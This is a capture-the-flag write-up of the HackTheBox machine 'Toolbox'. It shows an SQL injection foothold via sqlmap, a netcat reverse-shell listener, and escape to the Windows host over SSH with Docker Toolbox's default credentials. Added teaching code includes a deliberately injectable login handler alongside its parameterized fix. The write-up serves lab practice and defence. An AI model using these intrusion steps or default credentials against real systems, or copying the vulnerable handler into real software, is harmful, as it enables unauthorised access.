HackTheBox - Toolbox
Toolbox is a Windows machine running a Docker Toolbox install. A Linux container hosted there serves a website that is vulnerable to SQL injection, which we use to establish a foothold. Docker Toolbox's default credentials then let us escape the container and obtain a privileged shell on the Windows host.
Enumeration
nmap shows several open ports.
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
FTP
Starting off with FTP, since anonymous login is allowed.
$ ftp 10.129.96.171
Connected to 10.129.96.171.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (10.129.96.171:kali): anonymous
331 Password required for anonymous
Password:
230 Logged on
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||50177|)
150 Opening data channel for directory listing of "/"
-r-xr-xr-x 1 ftp ftp 242520560 Feb 18 2020 docker-toolbox.exe
226 Successfully transferred "/"
ftp>
Judging by the file named docker-toolbox.exe, the host is likely running Docker Toolbox to host its containers.
HTTPS
Browsing to port 443, we get a certificate warning since the certificate is self-signed. A website for a company named 'Megalogistics' is shown.
Nikto shows that the SSL certificate is valid for admin.megalogistic.com.
Adding this hostname to /etc/hosts and browsing to the site, a login form can be found.
Trying to log in with default credentials such as admin:admin is not successful. We intercept the login request with Burp and save it to a file so that sqlmap can use it.
To check whether the site is vulnerable to SQLi, we run sqlmap against the saved request with the --force-ssl argument (the saved request carries no scheme, so sqlmap has to be told to use HTTPS).
sqlmap reports that the username parameter is vulnerable.
From there, sqlmap also lets us obtain code execution on the database server.
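The class of bug sqlmap found here, as an added example that is not part of the original post and not the Megalogistic application's code: a login handler that splices the username into the SQL text, next to the parameterized version that fixes it. SQLite stands in for the box's PostgreSQL, and the user table, passwords and the hash_password helper are constructed for the example.

```python
import hashlib
import sqlite3

# Constructed sample users; SQLite stands in for the box's PostgreSQL.
SAMPLE_USERS = [("admin", "Str0ng-admin-pass"), ("tony", "tonys-password")]


def hash_password(password):
    # sha256 keeps the example self-contained; a real login handler should use a
    # slow, salted password hash (bcrypt, scrypt or argon2) instead.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [(name, hash_password(pw)) for name, pw in SAMPLE_USERS],
    )
    return conn


def login_vulnerable(conn, username, password):
    # Vulnerable: the username is spliced straight into the SQL text, so a quote
    # in it changes the structure of the query. This is what sqlmap detects when
    # it reports the username parameter as injectable.
    query = (
        "SELECT username FROM users WHERE username = '%s' AND password_hash = '%s'"
        % (username, hash_password(password))
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    # Fixed: bound parameters are sent as data and never parsed as SQL, so the
    # same input is simply a username that does not exist.
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password_hash = ?",
        (username, hash_password(password)),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for handler in (login_vulnerable, login_safe):
        print(handler.__name__, "valid creds  ->", handler(db, "admin", "Str0ng-admin-pass"))
        print(handler.__name__, "quoted input ->", handler(db, "admin' --", "wrong"))
```

With the vulnerable handler, a username containing a single quote followed by a comment marker turns the rest of the WHERE clause into a comment, so the password check never runs; with bound parameters the same string is compared literally and the login fails. Parameterized queries (or an ORM that uses them) are the fix for the whole class, not input filtering.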
After starting our listener, we execute a bash reverse shell to obtain a foothold.
└─$ nc -lvnp 1337
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.129.96.171.
Ncat: Connection from 10.129.96.171:53999.
bash: cannot set terminal process group (1127): Inappropriate ioctl for device
bash: no job control in this shell
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$
We receive a shell in the context of the postgres user. The user flag can be found in /var/lib/postgresql.
postgres@bc56e3cc55e9:/home/tony$ cd /var/lib/postgresql
cd /var/lib/postgresql
postgres@bc56e3cc55e9:/var/lib/postgresql$ ls
ls
11
user.txt
postgres@bc56e3cc55e9:/var/lib/postgresql$ cat user.txt
cat user.txt
<redacted> flag.txt
Privilege Escalation
For the privilege escalation part, we refer to the Docker Toolbox documentation. In short, Docker Toolbox uses Boot2Docker to run a VM in which all containers are hosted, and from inside a container that Docker host can be reached at the gateway IP.
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.2 netmask 255.255.0.0 broadcast 172.17.255.255
ether 02:42:ac:11:00:02 txqueuelen 0 (Ethernet)
RX packets 170164 bytes 22343857 (21.3 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 93017 bytes 38447922 (36.6 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
As we can see, the container IP is 172.17.0.2 on a /16, so the gateway is 172.17.0.1. The documentation also lists the default credentials of the Boot2Docker VM: docker:tcuser.
We first have to upgrade our shell to a fully interactive one, e.g. via Python's pty module; otherwise SSH cannot allocate a pseudo-terminal to read the password and the login fails, as seen below.
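How the gateway address follows from the container's interface, as an added example not taken from the original post: a small parser for ifconfig output plus the Docker default-bridge rule that the host (docker0) sits at the first usable address of the bridge network. The ifconfig text is the output shown above; the function names and the second test network are my own.

```python
import ipaddress
import re

# ifconfig output as captured inside the container on this box.
IFCONFIG_OUTPUT = """\
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.2  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:ac:11:00:02  txqueuelen 0  (Ethernet)
        RX packets 170164  bytes 22343857 (21.3 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 93017  bytes 38447922 (36.6 MiB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0
"""

# Interface header line ("eth0: flags=...") and the IPv4 address line.
IFACE_RE = re.compile(r"^(\S+):\s+flags=")
INET_RE = re.compile(r"inet (\d+\.\d+\.\d+\.\d+)\s+netmask (\d+\.\d+\.\d+\.\d+)")


def parse_ifconfig(text):
    """Return {interface: (address, netmask)} for each IPv4 interface in ifconfig output."""
    ifaces = {}
    current = None
    for line in text.splitlines():
        header = IFACE_RE.match(line)
        if header:
            current = header.group(1)
            continue
        inet = INET_RE.search(line)
        if inet and current:
            ifaces[current] = (inet.group(1), inet.group(2))
    return ifaces


def bridge_gateway(address, netmask):
    """Docker's default bridge assigns the host side (docker0) the first usable address."""
    net = ipaddress.IPv4Network(f"{address}/{netmask}", strict=False)
    return str(net.network_address + 1)


def docker_host_candidates(text):
    """Map each non-loopback interface to the address the Docker host would have on it."""
    return {
        name: bridge_gateway(addr, mask)
        for name, (addr, mask) in parse_ifconfig(text).items()
        if name != "lo"
    }


if __name__ == "__main__":
    for iface, gw in docker_host_candidates(IFCONFIG_OUTPUT).items():
        print(f"{iface}: Docker host expected at {gw}")
```

The defender's takeaway is the same topology fact read the other way: every service the Boot2Docker VM listens on at the bridge address, including its SSH daemon with the documented default password, is reachable from every container on that bridge, so a single injectable web form in one container is one hop away from the host.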
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ ssh docker@172.17.0.1
Pseudo-terminal will not be allocated because stdin is not a terminal.
Permission denied, please try again.
Permission denied, please try again.
docker@172.17.0.1: Permission denied (publickey,password,keyboard-interactive).
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ python3 -c 'import pty; pty.spawn("/bin/bash")'
<in$ python3 -c 'import pty; pty.spawn("/bin/bash")'
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ ssh docker@172.17.0.1
ssh docker@172.17.0.1
docker@172.17.0.1's password: tcuser
( '>')
/) TC (\ Core is distributed with ABSOLUTELY NO WARRANTY.
(/-_--_-\) www.tinycorelinux.net
docker@box:~$
We are able to log in to the Docker VM. According to the FAQ, Docker Toolbox shares the C:\Users folder with the VM, where it is mounted at /c/Users.
docker@box:~$ cd /c/Users
cd /c/Users
docker@box:/c/Users$ ls
ls
Administrator Default Public desktop.ini
All Users Default User Tony
From here on, we can just browse to the Administrator folder and grab the root flag.
docker@box:/c/Users/Administrator$ cd Desktop
cd Desktop
docker@box:/c/Users/Administrator/Desktop$ ls
ls
desktop.ini root.txt
docker@box:/c/Users/Administrator/Desktop$ cat root.txt
cat root.txt
<redacted>
This box was another good example of how useful it is to refer to the documentation when looking for weak default authentication, misconfigurations and so on.